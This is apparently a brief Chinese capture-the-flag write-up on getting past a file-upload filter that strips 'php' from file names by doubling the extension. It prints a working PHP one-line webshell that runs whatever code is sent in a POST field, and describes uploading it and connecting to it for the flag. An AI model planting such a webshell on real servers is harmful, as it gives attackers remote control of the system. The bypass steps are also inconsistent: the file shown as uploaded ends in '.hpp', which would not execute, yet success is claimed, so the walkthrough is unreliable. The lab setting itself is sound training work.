双写绕过上传

发表于2024-03-05|更新于2024-10-23|文件上传

|字数总计:94|阅读时长:1分钟|阅读量:

思路

网页有上传文件的入口，先尝试上传一个一句话木马

<?php eval($_POST['cssec']); ?>

网页提示

文件 exp.php 已经上传。

文件路径: uploads/exp.

php后缀名被替换为空了，尝试双写绕过，改为exp.phphpp 上传

文件 exp.phphpp 已经上传。

文件路径: uploads/exp.hpp

连接木马，得到flag